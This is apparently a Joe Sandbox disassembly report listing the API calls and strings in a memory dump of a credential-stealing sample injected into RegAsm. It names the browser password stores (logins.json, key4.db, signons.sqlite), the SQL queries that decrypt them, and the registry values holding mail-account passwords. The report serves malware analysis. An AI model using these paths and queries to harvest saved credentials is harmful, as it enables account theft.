                                                                                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                APIs
                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                Strings
                                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00406782
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                Strings
                                                                                                                                                                                • , xrefs: 00406834
                                                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                • API String ID: 710961058-601624466
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                • API String ID: 2003275452-3138536805
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                • String ID: salu
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                • Salt, xrefs: 00443BA7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpymemset$??2@??3@ByteCharCloseFreeLibraryLoadLocalMultiWidestrlenstrtoul
                                                                                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                Strings
                                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
